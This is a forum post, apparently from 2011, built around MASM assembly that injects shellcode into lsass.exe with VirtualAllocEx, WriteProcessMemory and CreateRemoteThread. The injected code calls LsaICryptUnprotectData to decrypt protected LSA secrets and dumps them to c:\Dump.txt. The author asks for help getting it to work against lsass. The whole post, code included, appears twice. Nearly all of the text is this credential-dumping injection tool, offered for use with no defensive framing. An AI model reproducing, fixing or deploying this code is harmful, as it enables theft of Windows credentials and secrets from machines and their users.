AgentSmithers
May 12th, 2011, 09:04 PM
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\lsasrv.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\lsasrv.lib
.const
PROCESS_HANDLE equ 0
PROCESS_ID equ 1
.data
szProcess db 'lsass.exe',0
szKernel db 'KERNEL32',0
szGetProcAddress db 'GetProcAddress',0
.data?
hProcess dd ?
lpInjected dd ?
lenInjected dd ?
pInfo PROCESS_INFORMATION <>
sInfo STARTUPINFO <>
Injected PROTO:DWORD
.code
Injected PROC lpGetProcAddress:DWORD
LOCAL Stack[20h]:dword
LOCAL entropy[16]:byte
LOCAL Buffer[100h]:byte
LOCAL cbSize:dword
LOCAL BytesReturned:dword
ASSUME fs:NOTHING
push ebp
xor eax,eax
mov esi,fs:[eax+30h]
mov esi,[esi+0Ch]
mov esi,[esi+1Ch]
next_module:
mov ebp,[esi+08h]
mov edi,[esi+20h]
mov esi,[esi]
cmp [edi+12*2],al
jne next_module
cmp byte ptr[edi],6Bh
je find_kernel32_finished
cmp byte ptr[edi],4Bh
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov ecx,ebp
pop ebp
mov eax,lpGetProcAddress
mov Stack,eax
mov Stack+4,ecx
call loc_1
_szLoadLibraryA db "LoadLibraryA",0
loc_1:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+8,eax
call loc_2
_szlsasrv db "lsasrv.dll",0
loc_2:
pop ecx
invoke (type LoadLibrary)ptr Stack+8,ecx
mov Stack+12,eax
call loc_3
_szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
loc_3:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
mov Stack+16,eax
invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize
call loc_4
_szCreateFileA db "CreateFileA",0
loc_4:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+20,eax
call loc_5
_szWriteFile db "WriteFile",0
loc_5:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+24,eax
call loc_6
_szExitThread db "ExitThread",0
loc_6:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+28,eax
call loc_7
FileName db "c:\Dump.txt", 0
loc_7:
pop ecx
;BreakpointHere db 0cch
invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
mov ecx, eax
invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0
invoke (type ExitThread)ptr Stack+28, 0
ret
Injected endp
EndInjected:
FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
LOCAL Process :PROCESSENTRY32
lea esi,Process
assume esi:ptr PROCESSENTRY32
mov [esi].dwSize, sizeof PROCESSENTRY32
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov edi,eax
invoke Process32First,edi,esi
.while eax!=FALSE
lea eax,[esi].szExeFile
invoke lstrcmpi,eax,_exename
.if eax==0
;---found process---
mov eax,[esi].th32ProcessID
jmp @return
.endif
invoke Process32Next,edi,esi
.endw
@return:
assume esi:nothing
push eax
invoke CloseHandle,edi
pop eax
.if _returntype==PROCESS_HANDLE
invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess
.endif
ret
FindProcessByName endp
start:
;invoke GetModuleHandle,addr szKernel
;invoke GetProcAddress,eax,addr szGetProcAddress
;invoke Injected, EAX
;invoke ExitProcess,0
mov ebx,EndInjected
sub ebx,Injected
mov lenInjected,ebx
invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
mov hProcess, eax
invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
mov lpInjected,eax
invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
invoke GetModuleHandle,addr szKernel
invoke GetProcAddress,eax,addr szGetProcAddress
invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0
invoke ExitProcess,0
end start
I wrote alot of this code from scrach and the rest from snibblets.
Everything here seems to work fine with calc.exe but of course it does not have access to the crypted data, but when I run it targeting Lsass.exe it dose not execute correctly. Anyone have any idea on how this is done correctly?
EDIT:
I am guessing this is the issue =(
http://mnin.blogspot.com/2007/05/injecting-code-into-privileged-win32.html
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
include \masm32\include\user32.inc
include \masm32\include\lsasrv.inc
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\user32.lib
includelib \masm32\lib\lsasrv.lib
.const
PROCESS_HANDLE equ 0
PROCESS_ID equ 1
.data
szProcess db 'lsass.exe',0
szKernel db 'KERNEL32',0
szGetProcAddress db 'GetProcAddress',0
.data?
hProcess dd ?
lpInjected dd ?
lenInjected dd ?
pInfo PROCESS_INFORMATION <>
sInfo STARTUPINFO <>
Injected PROTO:DWORD
.code
Injected PROC lpGetProcAddress:DWORD
LOCAL Stack[20h]:dword
LOCAL entropy[16]:byte
LOCAL Buffer[100h]:byte
LOCAL cbSize:dword
LOCAL BytesReturned:dword
ASSUME fs:NOTHING
push ebp
xor eax,eax
mov esi,fs:[eax+30h]
mov esi,[esi+0Ch]
mov esi,[esi+1Ch]
next_module:
mov ebp,[esi+08h]
mov edi,[esi+20h]
mov esi,[esi]
cmp [edi+12*2],al
jne next_module
cmp byte ptr[edi],6Bh
je find_kernel32_finished
cmp byte ptr[edi],4Bh
je find_kernel32_finished
jmp next_module
find_kernel32_finished:
mov ecx,ebp
pop ebp
mov eax,lpGetProcAddress
mov Stack,eax
mov Stack+4,ecx
call loc_1
_szLoadLibraryA db "LoadLibraryA",0
loc_1:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+8,eax
call loc_2
_szlsasrv db "lsasrv.dll",0
loc_2:
pop ecx
invoke (type LoadLibrary)ptr Stack+8,ecx
mov Stack+12,eax
call loc_3
_szLsaICryptUnprotectData db "LsaICryptUnprotectData",0
loc_3:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+12,ecx
mov Stack+16,eax
invoke (type LsaICryptUnprotectData)ptr Stack+16, ADDR Buffer,0FFFFh, 0, 0, 0, 0, 20000041h, 0, ADDR entropy, ADDR cbSize
call loc_4
_szCreateFileA db "CreateFileA",0
loc_4:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+20,eax
call loc_5
_szWriteFile db "WriteFile",0
loc_5:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+24,eax
call loc_6
_szExitThread db "ExitThread",0
loc_6:
pop ecx
invoke (type GetProcAddress)ptr Stack,Stack+4,ecx
mov Stack+28,eax
call loc_7
FileName db "c:\Dump.txt", 0
loc_7:
pop ecx
;BreakpointHere db 0cch
invoke (type CreateFileA)ptr Stack+20, ECX, GENERIC_WRITE, 7, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0
mov ecx, eax
invoke (type WriteFile)ptr Stack+24, ECX, ADDR Buffer, 0FFFFh, ADDR BytesReturned, 0
invoke (type ExitThread)ptr Stack+28, 0
ret
Injected endp
EndInjected:
FindProcessByName proc uses ebx ecx edx esi edi _exename:dword,_returntype:dword
LOCAL Process :PROCESSENTRY32
lea esi,Process
assume esi:ptr PROCESSENTRY32
mov [esi].dwSize, sizeof PROCESSENTRY32
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov edi,eax
invoke Process32First,edi,esi
.while eax!=FALSE
lea eax,[esi].szExeFile
invoke lstrcmpi,eax,_exename
.if eax==0
;---found process---
mov eax,[esi].th32ProcessID
jmp @return
.endif
invoke Process32Next,edi,esi
.endw
@return:
assume esi:nothing
push eax
invoke CloseHandle,edi
pop eax
.if _returntype==PROCESS_HANDLE
invoke OpenProcess,PROCESS_ALL_ACCESS,0,eax ;return hProcess
.endif
ret
FindProcessByName endp
start:
;invoke GetModuleHandle,addr szKernel
;invoke GetProcAddress,eax,addr szGetProcAddress
;invoke Injected, EAX
;invoke ExitProcess,0
mov ebx,EndInjected
sub ebx,Injected
mov lenInjected,ebx
invoke FindProcessByName,ADDR szProcess,PROCESS_HANDLE
mov hProcess, eax
invoke VirtualAllocEx,hProcess, 0, lenInjected, MEM_COMMIT+MEM_RESERVE,PAGE_EXECUTE_READWRITE
mov lpInjected,eax
invoke WriteProcessMemory,hProcess,lpInjected,Injected,lenInjected,0
invoke GetModuleHandle,addr szKernel
invoke GetProcAddress,eax,addr szGetProcAddress
invoke CreateRemoteThread,hProcess,0,0,lpInjected,eax,0,0
invoke ExitProcess,0
end start
I wrote alot of this code from scrach and the rest from snibblets.
Everything here seems to work fine with calc.exe but of course it does not have access to the crypted data, but when I run it targeting Lsass.exe it dose not execute correctly. Anyone have any idea on how this is done correctly?
EDIT:
I am guessing this is the issue =(
http://mnin.blogspot.com/2007/05/injecting-code-into-privileged-win32.html